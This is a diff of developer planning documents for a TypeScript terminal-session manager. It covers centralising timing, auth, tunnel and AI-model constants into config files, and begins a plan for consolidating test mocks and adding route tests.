||||
/** Immediate flush threshold for terminal batches (bytes).
|
||||
* Set high (32KB) to allow effective batching; avg Ink events are ~14KB. */
|
||||
export const BATCH_FLUSH_THRESHOLD = 32 * 1024;
|
||||
|
||||
/** Task event batching interval (ms) */
|
||||
export const TASK_UPDATE_BATCH_INTERVAL = 100;
|
||||
|
||||
/** SSE client health check interval (ms) */
|
||||
export const SSE_HEALTH_CHECK_INTERVAL = 30 * 1000;
|
||||
|
||||
// ============================================================================
|
||||
// State Persistence
|
||||
// ============================================================================
|
||||
|
||||
/** State update debounce — batches expensive toDetailedState() calls (ms) */
|
||||
export const STATE_UPDATE_DEBOUNCE_INTERVAL = 500;
|
||||
|
||||
/** Sessions list cache TTL — avoids re-serializing on every SSE init (ms) */
|
||||
export const SESSIONS_LIST_CACHE_TTL = 1000;
|
||||
|
||||
// ============================================================================
|
||||
// Scheduled Runs
|
||||
// ============================================================================
|
||||
|
||||
/** Scheduled runs cleanup check interval (ms) */
|
||||
export const SCHEDULED_CLEANUP_INTERVAL = 5 * 60 * 1000;
|
||||
|
||||
/** Completed scheduled run max age before cleanup (ms) */
|
||||
export const SCHEDULED_RUN_MAX_AGE = 60 * 60 * 1000;
|
||||
|
||||
/** Session limit retry wait before retrying (ms) */
|
||||
export const SESSION_LIMIT_WAIT_MS = 5000;
|
||||
|
||||
/** Pause between scheduled run iterations (ms) */
|
||||
export const ITERATION_PAUSE_MS = 2000;
|
||||
|
||||
// ============================================================================
|
||||
// Mux Stats
|
||||
// ============================================================================
|
||||
|
||||
/** Mux stats collection interval (ms) */
|
||||
export const STATS_COLLECTION_INTERVAL_MS = 2000;
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
npx tsx src/index.ts web --port 3099 &
|
||||
curl -s http://localhost:3099/api/status | jq .status # "ok"
|
||||
kill %1
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 2: Create `src/config/auth-config.ts`
|
||||
|
||||
**Estimated effort**: 20 minutes
|
||||
**Files created**: `src/config/auth-config.ts`
|
||||
**Files modified**: `src/web/middleware/auth.ts`, `src/hooks-config.ts`
|
||||
|
||||
### Constants to extract from `src/web/middleware/auth.ts`
|
||||
|
||||
| Constant | Value | Purpose |
|
||||
|----------|-------|---------|
|
||||
| `AUTH_SESSION_TTL_MS` | `86400000` | Auth session cookie TTL (24h) |
|
||||
| `MAX_AUTH_SESSIONS` | `100` | Max concurrent auth sessions |
|
||||
| `AUTH_FAILURE_MAX` | `10` | Max failed auth attempts per IP |
|
||||
| `AUTH_FAILURE_WINDOW_MS` | `900000` | Failed auth tracking window (15 min) |
|
||||
|
||||
### Constants to extract from `src/hooks-config.ts`
|
||||
|
||||
| Constant | Value | Purpose |
|
||||
|----------|-------|---------|
|
||||
| `HOOK_TIMEOUT_MS` | `10000` | Timeout for Claude Code hook commands |
|
||||
|
||||
The `timeout: 10000` value is hardcoded 6 times in `hooks-config.ts` as inline literals. Extract to a single named constant.
|
||||
|
||||
### Implementation
|
||||
|
||||
1. Create `src/config/auth-config.ts` with the 5 constants.
|
||||
2. In `src/web/middleware/auth.ts`: Remove the 4 local constant declarations (lines 17–25). Add import from `../../config/auth-config.js`. Keep `AUTH_COOKIE_NAME` in place — it's a string identifier, not a tunable numeric constant.
|
||||
3. In `src/hooks-config.ts`: Replace all 6 inline `timeout: 10000` occurrences with `timeout: HOOK_TIMEOUT_MS`. Add import from `./config/auth-config.js`.
|
||||
4. Run `tsc --noEmit`.
|
||||
|
||||
### New file template
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* @fileoverview Authentication, rate limiting, and hook security constants.
|
||||
*
|
||||
* Controls auth session lifecycle, brute-force protection,
|
||||
* and Claude Code hook timeouts.
|
||||
*
|
||||
* @module config/auth-config
|
||||
*/
|
||||
|
||||
// ============================================================================
|
||||
// Session Cookies
|
||||
// ============================================================================
|
||||
|
||||
/** Auth session cookie TTL — matches autonomous run length (ms) */
|
||||
export const AUTH_SESSION_TTL_MS = 24 * 60 * 60 * 1000;
|
||||
|
||||
/** Max concurrent auth sessions per server */
|
||||
export const MAX_AUTH_SESSIONS = 100;
|
||||
|
||||
// ============================================================================
|
||||
// Rate Limiting
|
||||
// ============================================================================
|
||||
|
||||
/** Max failed auth attempts per IP before 429 rejection */
|
||||
export const AUTH_FAILURE_MAX = 10;
|
||||
|
||||
/** Failed auth attempt tracking window (ms) */
|
||||
export const AUTH_FAILURE_WINDOW_MS = 15 * 60 * 1000;
|
||||
|
||||
// ============================================================================
|
||||
// Hooks
|
||||
// ============================================================================
|
||||
|
||||
/** Timeout for Claude Code hook curl commands (ms) */
|
||||
export const HOOK_TIMEOUT_MS = 10000;
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
npm run lint
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 3: Create `src/config/tunnel-config.ts`
|
||||
|
||||
**Estimated effort**: 20 minutes
|
||||
**Files created**: `src/config/tunnel-config.ts`
|
||||
**Files modified**: `src/tunnel-manager.ts`
|
||||
|
||||
### Constants to extract from `src/tunnel-manager.ts`
|
||||
|
||||
| Constant | Value | Purpose |
|
||||
|----------|-------|---------|
|
||||
| `QR_TOKEN_TTL_MS` | `60000` | QR token auto-rotation interval (60s) |
|
||||
| `QR_TOKEN_GRACE_MS` | `90000` | Grace period for previous token (90s) |
|
||||
| `SHORT_CODE_LENGTH` | `6` | Length of QR short code |
|
||||
| `QR_RATE_LIMIT_MAX` | `30` | Global QR attempt rate limit |
|
||||
| `QR_RATE_LIMIT_WINDOW_MS` | `60000` | QR rate limit reset window (60s) |
|
||||
| `URL_TIMEOUT_MS` | `30000` | Cloudflared URL fetch timeout (30s) |
|
||||
| `RESTART_DELAY_MS` | `5000` | Tunnel restart delay after crash (5s) |
|
||||
| `FORCE_KILL_MS` | `5000` | SIGTERM → SIGKILL escalation timeout (5s) |
|
||||
|
||||
### Implementation
|
||||
|
||||
1. Create `src/config/tunnel-config.ts` with all 8 constants.
|
||||
2. In `src/tunnel-manager.ts`: Remove the 8 local constant declarations (lines ~39–75). Add `import { QR_TOKEN_TTL_MS, ... } from './config/tunnel-config.js'`.
|
||||
3. Keep the `TUNNEL_URL_REGEX` in `tunnel-manager.ts` — it's a parsing detail, not a tuning knob.
|
||||
4. Run `tsc --noEmit`.
|
||||
|
||||
### New file template
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* @fileoverview Cloudflare tunnel and QR authentication constants.
|
||||
*
|
||||
* Controls QR token rotation timing, rate limiting,
|
||||
* and tunnel process lifecycle.
|
||||
*
|
||||
* @module config/tunnel-config
|
||||
*/
|
||||
|
||||
// ============================================================================
|
||||
// QR Token Rotation
|
||||
// ============================================================================
|
||||
|
||||
/** QR token auto-rotation interval (ms) */
|
||||
export const QR_TOKEN_TTL_MS = 60_000;
|
||||
|
||||
/** Grace period — previous token still valid during rotation (ms) */
|
||||
export const QR_TOKEN_GRACE_MS = 90_000;
|
||||
|
||||
/** Length of the short code in QR URL path (chars) */
|
||||
export const SHORT_CODE_LENGTH = 6;
|
||||
|
||||
// ============================================================================
|
||||
// QR Rate Limiting
|
||||
// ============================================================================
|
||||
|
||||
/** Global rate limit for QR auth attempts across all IPs */
|
||||
export const QR_RATE_LIMIT_MAX = 30;
|
||||
|
||||
/** QR rate limit reset window (ms) */
|
||||
export const QR_RATE_LIMIT_WINDOW_MS = 60_000;
|
||||
|
||||
// ============================================================================
|
||||
// Tunnel Process Lifecycle
|
||||
// ============================================================================
|
||||
|
||||
/** Max time to wait for cloudflared URL before timeout (ms) */
|
||||
export const URL_TIMEOUT_MS = 30_000;
|
||||
|
||||
/** Restart delay after unexpected tunnel exit (ms) */
|
||||
export const RESTART_DELAY_MS = 5_000;
|
||||
|
||||
/** SIGTERM → SIGKILL escalation timeout (ms) */
|
||||
export const FORCE_KILL_MS = 5_000;
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 4: Create `src/config/terminal-limits.ts`
|
||||
|
||||
**Estimated effort**: 20 minutes
|
||||
**Files created**: `src/config/terminal-limits.ts`
|
||||
**Files modified**: `src/web/routes/session-routes.ts`
|
||||
|
||||
### Constants to extract from `src/web/routes/session-routes.ts`
|
||||
|
||||
| Constant | Value | Purpose |
|
||||
|----------|-------|---------|
|
||||
| `MAX_INPUT_LENGTH` | `65536` | Max input length per request (64KB) |
|
||||
| `MAX_TERMINAL_COLS` | `500` | Max terminal columns |
|
||||
| `MAX_TERMINAL_ROWS` | `200` | Max terminal rows |
|
||||
| `MAX_SESSION_NAME_LENGTH` | `128` | Max session name length (chars) |
|
||||
|
||||
### Why a separate file instead of adding to `buffer-limits.ts`
|
||||
|
||||
`buffer-limits.ts` covers memory buffer sizes (2MB terminal, 1MB text). These constants are **validation limits** for API inputs — different concern. A terminal resize request must not exceed `MAX_TERMINAL_COLS`; this has nothing to do with buffer trimming.
|
||||
|
||||
### Implementation
|
||||
|
||||
1. Create `src/config/terminal-limits.ts` with all 4 constants.
|
||||
2. In `src/web/routes/session-routes.ts`: Remove the 4 local constant declarations (lines 45–48). Add `import { MAX_INPUT_LENGTH, MAX_TERMINAL_COLS, MAX_TERMINAL_ROWS, MAX_SESSION_NAME_LENGTH } from '../../config/terminal-limits.js'`.
|
||||
3. Run `tsc --noEmit`.
|
||||
|
||||
### New file template
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* @fileoverview Terminal dimension and input validation limits.
|
||||
*
|
||||
* Used by API routes to validate resize, input, and session
|
||||
* creation requests. Separate from buffer-limits.ts which
|
||||
* controls memory buffer sizes.
|
||||
*
|
||||
* @module config/terminal-limits
|
||||
*/
|
||||
|
||||
/** Max input length per API request (bytes) */
|
||||
export const MAX_INPUT_LENGTH = 64 * 1024;
|
||||
|
||||
/** Max terminal columns for resize requests */
|
||||
export const MAX_TERMINAL_COLS = 500;
|
||||
|
||||
/** Max terminal rows for resize requests */
|
||||
export const MAX_TERMINAL_ROWS = 200;
|
||||
|
||||
/** Max session name length (chars) */
|
||||
export const MAX_SESSION_NAME_LENGTH = 128;
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 5: Create `src/config/ai-defaults.ts`
|
||||
|
||||
**Estimated effort**: 30 minutes
|
||||
**Files created**: `src/config/ai-defaults.ts`
|
||||
**Files modified**: `src/respawn-controller.ts`, `src/ai-idle-checker.ts`, `src/ai-plan-checker.ts`, `src/web/routes/respawn-routes.ts`
|
||||
|
||||
### Problem: AI model string duplicated 5 times
|
||||
|
||||
The model identifier `'claude-opus-4-5-20251101'` appears in 5 places across 4 files. When the model changes, all 5 must be updated — a guaranteed source of bugs. The context limits (`16000`, `8000`) are similarly scattered across 3 files each.
|
||||
|
||||
| Constant | Current Value | Duplicated In |
|
||||
|----------|---------------|---------------|
|
||||
| `AI_CHECK_MODEL` | `'claude-opus-4-5-20251101'` | `respawn-controller.ts` (×2: idle + plan), `ai-idle-checker.ts`, `ai-plan-checker.ts`, `respawn-routes.ts` (×2: idle + plan) |
|
||||
| `AI_IDLE_CHECK_MAX_CONTEXT` | `16000` | `respawn-controller.ts`, `ai-idle-checker.ts`, `respawn-routes.ts` |
|
||||
| `AI_PLAN_CHECK_MAX_CONTEXT` | `8000` | `respawn-controller.ts`, `ai-plan-checker.ts`, `respawn-routes.ts` |
|
||||
|
||||
### Implementation
|
||||
|
||||
1. Create `src/config/ai-defaults.ts` with the 3 constants.
|
||||
2. In `src/respawn-controller.ts` `DEFAULT_CONFIG` (line 538): Replace `aiIdleCheckModel: 'claude-opus-4-5-20251101'` with `aiIdleCheckModel: AI_CHECK_MODEL`, `aiIdleCheckMaxContext: 16000` with `aiIdleCheckMaxContext: AI_IDLE_CHECK_MAX_CONTEXT`, `aiPlanCheckModel: 'claude-opus-4-5-20251101'` with `aiPlanCheckModel: AI_CHECK_MODEL`, `aiPlanCheckMaxContext: 8000` with `aiPlanCheckMaxContext: AI_PLAN_CHECK_MAX_CONTEXT`. Add import from `./config/ai-defaults.js`.
|
||||
3. In `src/ai-idle-checker.ts` `DEFAULT_AI_CHECK_CONFIG` (line 46): Replace `model: 'claude-opus-4-5-20251101'` with `model: AI_CHECK_MODEL`, `maxContextChars: 16000` with `maxContextChars: AI_IDLE_CHECK_MAX_CONTEXT`. Add import from `./config/ai-defaults.js`.
|
||||
4. In `src/ai-plan-checker.ts` `DEFAULT_PLAN_CHECK_CONFIG` (line 45): Replace `model: 'claude-opus-4-5-20251101'` with `model: AI_CHECK_MODEL`, `maxContextChars: 8000` with `maxContextChars: AI_PLAN_CHECK_MAX_CONTEXT`. Add import from `./config/ai-defaults.js`.
|
||||
5. In `src/web/routes/respawn-routes.ts` config merge block (lines 173–179): Replace all 4 inline fallback values with imports from `../../config/ai-defaults.js`.
|
||||
6. Run `tsc --noEmit`.
|
||||
|
||||
### New file template
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* @fileoverview Default model and context limits for AI-powered checkers.
|
||||
*
|
||||
* Centralizes the AI model identifier and context window sizes used by
|
||||
* the idle checker, plan checker, respawn controller defaults, and
|
||||
* respawn route fallbacks. Change the model here when upgrading.
|
||||
*
|
||||
* @module config/ai-defaults
|
||||
*/
|
||||
|
||||
/** Default model for AI idle and plan checkers */
|
||||
export const AI_CHECK_MODEL = 'claude-opus-4-5-20251101';
|
||||
|
||||
/** Max context chars for idle checker (~4k tokens) */
|
||||
export const AI_IDLE_CHECK_MAX_CONTEXT = 16000;
|
||||
|
||||
/** Max context chars for plan checker (~2k tokens, plan mode UI is compact) */
|
||||
export const AI_PLAN_CHECK_MAX_CONTEXT = 8000;
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
# Verify no remaining hardcoded model strings
|
||||
grep -rn 'claude-opus-4-5-20251101' src/ # Should only appear in config/ai-defaults.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 6: Create `src/config/team-config.ts`
|
||||
|
||||
**Estimated effort**: 15 minutes
|
||||
**Files created**: `src/config/team-config.ts`
|
||||
**Files modified**: `src/team-watcher.ts`
|
||||
|
||||
### Constants to extract from `src/team-watcher.ts`
|
||||
|
||||
| Constant | Value | Purpose |
|
||||
|----------|-------|---------|
|
||||
| `TEAM_POLL_INTERVAL_MS` | `30000` | Team directory poll interval (30s) |
|
||||
| `MAX_CACHED_TEAMS` | `50` | LRU cache size for team configs |
|
||||
| `MAX_CACHED_TASKS` | `200` | LRU cache size for team tasks + inboxes |
|
||||
|
||||
### Why centralize these
|
||||
|
||||
Team polling frequency and cache sizes are operational knobs that affect both performance (polling too often wastes CPU) and responsiveness (polling too rarely means stale team state in the UI). They're also the kind of values a developer tuning for a large team deployment would want to find quickly. `MAX_CACHED_TASKS` is used for both the task cache and inbox cache — worth documenting.
|
||||
|
||||
### Implementation
|
||||
|
||||
1. Create `src/config/team-config.ts` with the 3 constants.
|
||||
2. In `src/team-watcher.ts`: Remove the 3 local constants (lines 23–25). Add `import { TEAM_POLL_INTERVAL_MS, MAX_CACHED_TEAMS, MAX_CACHED_TASKS } from './config/team-config.js'`. Note: rename `POLL_INTERVAL_MS` → `TEAM_POLL_INTERVAL_MS` to avoid ambiguity with the identically-named constant in `subagent-watcher.ts`.
|
||||
3. Update the usage site: `setInterval(... POLL_INTERVAL_MS)` → `setInterval(... TEAM_POLL_INTERVAL_MS)`.
|
||||
4. Run `tsc --noEmit`.
|
||||
|
||||
### New file template
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* @fileoverview Agent Teams polling and cache configuration.
|
||||
*
|
||||
* Controls how frequently TeamWatcher polls ~/.claude/teams/
|
||||
* and how many teams/tasks are cached in memory.
|
||||
*
|
||||
* @module config/team-config
|
||||
*/
|
||||
|
||||
/** Team directory poll interval (ms) */
|
||||
export const TEAM_POLL_INTERVAL_MS = 30_000;
|
||||
|
||||
/** Max cached team configs (LRU eviction) */
|
||||
export const MAX_CACHED_TEAMS = 50;
|
||||
|
||||
/** Max cached team tasks and inbox messages (LRU eviction).
|
||||
* Used for both teamTasks and inboxCache maps. */
|
||||
export const MAX_CACHED_TASKS = 200;
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 7: Fix remaining cross-file duplicates
|
||||
|
||||
**Estimated effort**: 30 minutes
|
||||
**Files modified**: `src/index.ts`, `src/subagent-watcher.ts`
|
||||
|
||||
### Duplicate 1: `STATS_COLLECTION_INTERVAL_MS`
|
||||
|
||||
Already fixed in Task 1 — both `server.ts` and `mux-routes.ts` now import from `server-timing.ts`.
|
||||
|
||||
### Duplicate 2: AI model string
|
||||
|
||||
Already fixed in Task 5 — all 5 occurrences now import from `ai-defaults.ts`.
|
||||
|
||||
### Duplicate 3: `MAX_SCREENSHOT_SIZE` / `MAX_TEXT_FILE_SIZE` / `MAX_RAW_FILE_SIZE`
|
||||
|
||||
These file size limits in `file-routes.ts` and `system-routes.ts` are **API-specific validation limits**. They're only used in their respective route files and aren't duplicated. **Leave in place** — they're local to their route module and well-commented.
|
||||
|
||||
### Action A: Move `MAX_CONSECUTIVE_ERRORS` and `ERROR_RESET_MS` to config
|
||||
|
||||
`src/index.ts` has two process-level constants that are operational tuning knobs:
|
||||
|
||||
| Constant | Value | Purpose |
|
||||
|----------|-------|---------|
|
||||
| `MAX_CONSECUTIVE_ERRORS` | `5` | Max consecutive unhandled errors before process exit |
|
||||
| `ERROR_RESET_MS` | `60000` | Error counter reset interval (1 min) |
|
||||
|
||||
These belong in a config file since they control server reliability behavior. Add them to `src/config/server-timing.ts` (they're server operational constants).
|
||||
|
||||
1. Add to `src/config/server-timing.ts`:
|
||||
```typescript
|
||||
// ============================================================================
|
||||
// Process Error Recovery
|
||||
// ============================================================================
|
||||
|
||||
/** Max consecutive unhandled errors before auto-restart */
|
||||
export const MAX_CONSECUTIVE_ERRORS = 5;
|
||||
|
||||
/** Error counter reset interval — forgives errors after quiet period (ms) */
|
||||
export const ERROR_RESET_MS = 60_000;
|
||||
```
|
||||
2. In `src/index.ts`: Remove lines 19–20, add import from `./config/server-timing.js`.
|
||||
3. Run `tsc --noEmit`.
|
||||
|
||||
### Action B: Fix `MAX_TRACKED_AGENTS` shadow in `subagent-watcher.ts`
|
||||
|
||||
`subagent-watcher.ts` defines its own `MAX_TRACKED_AGENTS = 500` locally instead of importing the identical value from `config/map-limits.ts`. This is a latent bug — if someone changes the config value, the subagent watcher's copy stays stale.
|
||||
|
||||
1. In `src/subagent-watcher.ts`: Remove the local `MAX_TRACKED_AGENTS` constant. Add `import { MAX_TRACKED_AGENTS } from './config/map-limits.js'` (the value there is `MAX_TODOS_PER_SESSION = 500` — **verify** the map-limits constant is actually named `MAX_TRACKED_AGENTS` or if it needs to be added). If the constant doesn't exist in `map-limits.ts` under that name, add it.
|
||||
2. Run `tsc --noEmit`.
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
npm run lint
|
||||
npm run format:check
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 8: Update CLAUDE.md and final verification
|
||||
|
||||
**Estimated effort**: 20 minutes
|
||||
**Files modified**: `CLAUDE.md`
|
||||
|
||||
### Updates to CLAUDE.md
|
||||
|
||||
1. **Config Files table** (`src/config/`): Add the 6 new files:
|
||||
|
||||
| File | Purpose |
|
||||
|------|---------|
|
||||
| `buffer-limits.ts` | Terminal/text buffer size limits |
|
||||
| `map-limits.ts` | Global limits for Maps, sessions, watchers |
|
||||
| `exec-timeout.ts` | Execution timeout configuration |
|
||||
| `server-timing.ts` | Web server batching, SSE, scheduled run timing |
|
||||
| `auth-config.ts` | Auth session TTL, rate limits, hook timeout |
|
||||
| `tunnel-config.ts` | QR token rotation, tunnel process lifecycle |
|
||||
| `terminal-limits.ts` | Terminal dimension and input validation limits |
|
||||
| `ai-defaults.ts` | AI checker model and context limits |
|
||||
| `team-config.ts` | Agent Teams polling and cache sizes |
|
||||
|
||||
2. **Import Conventions** section: Add:
|
||||
```
|
||||
- **Config**: Import from specific files: `import { MAX_TERMINAL_COLS } from './config/terminal-limits'`
|
||||
```
|
||||
|
||||
3. **Phase 6 status** in `docs/code-structure-findings.md`: Mark as COMPLETE with summary of what was done.
|
||||
|
||||
### Final verification checklist
|
||||
|
||||
```bash
|
||||
# Type checking
|
||||
tsc --noEmit
|
||||
|
||||
# Linting
|
||||
npm run lint
|
||||
|
||||
# Formatting
|
||||
npm run format:check
|
||||
|
||||
# Dev server starts
|
||||
npx tsx src/index.ts web --port 3099 &
|
||||
curl -s http://localhost:3099/api/status | jq .status # "ok"
|
||||
kill %1
|
||||
|
||||
# Verify no remaining duplicates
|
||||
grep -rn 'STATS_COLLECTION_INTERVAL_MS' src/ # Should only appear in config + import sites
|
||||
grep -rn 'timeout: 10000' src/hooks-config.ts # Should be 0 — all replaced with HOOK_TIMEOUT_MS
|
||||
grep -rn 'claude-opus-4-5-20251101' src/ # Should only appear in config/ai-defaults.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## What is NOT in scope (and why)
|
||||
|
||||
These constants were considered but deliberately left in their current files:
|
||||
|
||||
### Respawn controller defaults (`src/respawn-controller.ts`)
|
||||
|
||||
The `DEFAULT_CONFIG` object (lines 538–578) contains ~30 default values for the `RespawnConfig` interface. These are **user-facing configuration defaults**, not system constants — they're the starting values for a config object that users can modify via the API and UI. Centralizing them would break the locality between the config interface definition and its defaults. They already have excellent JSDoc with `@default` tags. The only values extracted are the AI model/context constants (Task 5) which are duplicated in other files.
|
||||
|
||||
### Subagent watcher timing (`src/subagent-watcher.ts`)
|
||||
|
||||
The 18 constants at lines 129–158 are all internal to the subagent watcher's polling/lifecycle algorithm. Moving them to a config file would force developers to context-switch between two files to understand the polling logic. They're already grouped with clear comments. Exception: `MAX_TRACKED_AGENTS` is consolidated with `map-limits.ts` (Task 7B) since it duplicates a global limit.
|
||||
|
||||
### Session auto-ops timing (`src/session-auto-ops.ts`)
|
||||
|
||||
The 8 constants at lines 19–40 are internal to the auto-compact/clear retry state machine. They form a coherent group that's meaningless without the surrounding implementation context.
|
||||
|
||||
### Run summary constants (`src/run-summary.ts`)
|
||||
|
||||
`MAX_EVENTS`, `TRIM_TO_EVENTS`, `TOKEN_MILESTONE_INTERVAL`, `STATE_STUCK_WARNING_MS`, `STATE_STUCK_CHECK_INTERVAL` — all module-internal. The buffer-style limits (`MAX_EVENTS`/`TRIM_TO_EVENTS`) follow the same pattern as `buffer-limits.ts` but are only used in this one file.
|
||||
|
||||
### Frontend (`src/web/public/constants.js`)
|
||||
|
||||
Already well-centralized. Frontend and backend run in different environments — mixing them in TypeScript config files would create import problems. If frontend constants need expansion, do it in `constants.js`. Note: `app.js` has 2 inline uses of `256 * 1024` that should use the existing `TERMINAL_TAIL_SIZE` from `constants.js` — a minor cleanup that can be done opportunistically but is not worth a task here.
|
||||
|
||||
### Tmux manager timing (`src/tmux-manager.ts`)
|
||||
|
||||
The 6 constants (lines 65–78) are internal to tmux process lifecycle management. They're low-level retry/wait values that are meaningless without understanding the tmux spawn sequence.
|
||||
|
||||
### Process-internal constants
|
||||
|
||||
`image-watcher.ts`, `bash-tool-parser.ts`, `transcript-watcher.ts`, `ralph-tracker.ts`, `task-tracker.ts`, `file-stream-manager.ts`, `session-lifecycle-log.ts`, `session-task-cache.ts`, `respawn-metrics.ts`, `respawn-adaptive-timing.ts`, `ai-checker-base.ts` — all have module-local constants that are internal implementation details.
|
||||
|
||||
### `localhost:3000` default URL
|
||||
|
||||
The string `'http://localhost:3000'` or port `3000` appears as a fallback default in ~5 files (`session-cli-builder.ts`, `tmux-manager.ts`, `tunnel-manager.ts`, `server.ts`, CLI). While technically duplicated, extracting it provides little value — each usage has a different fallback chain (env var → config → hardcoded) and the port is also baked into systemd service files and documentation. The risk of a missed update is low since port 3000 is deeply conventional.
|
||||
|
||||
### `SAVE_DEBOUNCE_MS = 500` in `state-store.ts` / `push-store.ts`
|
||||
|
||||
Same value (500ms), but they debounce different persistence targets (state.json vs push-subscriptions.json). If one needed faster/slower debouncing, they'd diverge. Coupling them would be misleading.
|
||||
|
||||
---
|
||||
|
||||
## Summary
|
||||
|
||||
| Metric | Before | After |
|
||||
|--------|--------|-------|
|
||||
| Config files in `src/config/` | 3 | 9 |
|
||||
| Constants centralized | ~25 | ~65 |
|
||||
| Cross-file duplicates | 9+ (`STATS_COLLECTION_INTERVAL_MS`, `timeout: 10000` ×6, AI model ×5, context limits ×3 each, `MAX_TRACKED_AGENTS`) | 0 |
|
||||
| Files with `timeout: 10000` inline | 1 (6 occurrences) | 0 |
|
||||
| Files with hardcoded AI model string | 4 (5 occurrences) | 1 (config only) |
|
||||
| Files modified | — | 11 |
|
||||
| Files created | — | 6 |
|
||||
@@ -1,953 +0,0 @@
|
||||
# Phase 7 Implementation Plan: Test Infrastructure
|
||||
|
||||
**Source**: `docs/code-structure-findings.md` (Phase 7 — Test Infrastructure)
|
||||
**Estimated effort**: 2–3 days
|
||||
**Tasks**: 11 tasks with dependencies (see dependency graph below)
|
||||
|
||||
---
|
||||
|
||||
## Safety Constraints
|
||||
|
||||
Before starting ANY work, read and follow these rules:
|
||||
|
||||
1. **Never run `npx vitest run`** (full suite) — it kills tmux sessions. You are running inside a Codeman-managed tmux session.
|
||||
2. **Run individual tests only**: `npx vitest run test/<file>.test.ts`
|
||||
3. **Never test on port 3000** — the live dev server runs there. Tests use ports 3150+.
|
||||
4. **After TypeScript changes**: Run `tsc --noEmit` to verify type checking passes.
|
||||
5. **Before considering done**: Run `npm run lint` and `npm run format:check` to ensure CI passes.
|
||||
6. **Never kill tmux sessions** — check `echo $CODEMAN_MUX` first.
|
||||
7. **Port assignments for this phase**: New tests use ports 3220–3229 (see individual tasks for assignments).
|
||||
|
||||
---
|
||||
|
||||
## Goal
|
||||
|
||||
Eliminate duplicated test mocks, activate the unused `respawn-test-utils.ts` utilities, and add route-level test coverage for the server's 12 route modules — the single largest untested area in the codebase (162 route handlers, 0 dedicated tests).
|
||||
|
||||
**Non-goals**:
|
||||
- Full end-to-end integration tests (those require real Claude CLI / tmux sessions)
|
||||
- 100% route coverage in this phase — focus on the highest-value route modules first
|
||||
- Refactoring test patterns in existing passing tests that don't use shared mocks
|
||||
- Migrating `vi.mock()`-based module replacement mocks (different pattern, see Task 6/7)
|
||||
|
||||
---
|
||||
|
||||
## Current State
|
||||
|
||||
### Mock Duplication (Finding #9)
|
||||
|
||||
`MockSession` is defined **4 times** across test files with varying levels of completeness:
|
||||
|
||||
| File | Properties | Methods | EventEmitter | Notes |
|
||||
|------|-----------|---------|-------------|-------|
|
||||
| `test/respawn-test-utils.ts` | 6 | 20+ | Yes | **Most complete**. Includes terminal simulation, token count, ANSI output, plan mode prompts. **Never imported by any test.** |
|
||||
| `test/respawn-controller.test.ts` | 6 | 9 | Yes | Subset of respawn-test-utils. Missing token simulation, ANSI helpers. |
|
||||
| `test/respawn-team-awareness.test.ts` | ~6 | ~9 | Yes | Near-copy of respawn-controller.test.ts version. |
|
||||
| `test/session-manager.test.ts` | 4 | 8 | Yes | **Inside `vi.mock()` factory** — replaces `../src/session.js` module. Different shape: `start()`/`stop()`/`toState()`/`sendInput()` for lifecycle testing. |
|
||||
|
||||
`MockStateStore` is defined **2 times** (both inside `vi.mock()` factories):
|
||||
|
||||
| File | Shape | Methods | Mock Pattern |
|
||||
|------|-------|---------|-------------|
|
||||
| `test/session-manager.test.ts` | `{ sessions, config }` | `getConfig`, `getSessions`, `getSession`, `setSession`, `removeSession` | `vi.mock('../src/state-store.js')` |
|
||||
| `test/ralph-loop.test.ts` | `{ ralphLoop, tasks, config }` | `getConfig`, `getRalphLoopState`, `setRalphLoopState`, `getTasks`, `setTask`, `removeTask` | `vi.mock('../src/state-store.js')` |
|
||||
|
||||
### Important: Two distinct mocking patterns
|
||||
|
||||
The codebase uses two different mocking patterns that require different migration strategies:
|
||||
|
||||
1. **Direct instantiation** (respawn-controller, respawn-team-awareness): `MockSession` is defined at file scope and instantiated directly in tests. These can be migrated to shared mocks via simple import replacement.
|
||||
|
||||
2. **Module replacement** (session-manager, ralph-loop): Mocks are defined inside `vi.mock()` factories that replace entire modules (`../src/session.js`, `../src/state-store.js`). These factories run in an isolated scope and return `{ Session: MockClass }` or `{ getStore: vi.fn(() => instance) }`. Migrating these requires either `vi.hoisted()` or restructuring the test's module mocking — higher risk for limited benefit.
|
||||
|
||||
### Unused Test Utilities
|
||||
|
||||
`test/respawn-test-utils.ts` exports these utilities that **no test file imports**:
|
||||
|
||||
- `TimeController` / `createTimeController()` — abstraction over vitest fake timers
|
||||
- `MockAiIdleChecker` / `MockAiPlanChecker` — fully mocked AI checkers with result queueing
|
||||
- `createStateTracker()` / `createEventRecorder()` — state transition and event recording
|
||||
- `FAST_TEST_CONFIG` / `AI_ENABLED_TEST_CONFIG` — pre-configured RespawnConfig objects
|
||||
- `waitForState()` / `waitForEvent()` / `createDeferred()` — async test helpers
|
||||
- `terminalOutputs` — factory object for common terminal output patterns
|
||||
|
||||
### Route Test Coverage
|
||||
|
||||
Currently **zero** dedicated tests for the 12 route modules in `src/web/routes/`. The existing test files that touch API endpoints:
|
||||
|
||||
| Test File | What It Tests | Approach |
|
||||
|-----------|--------------|----------|
|
||||
| `test/api-responses.test.ts` | Response structure validation | Imports types, no HTTP calls |
|
||||
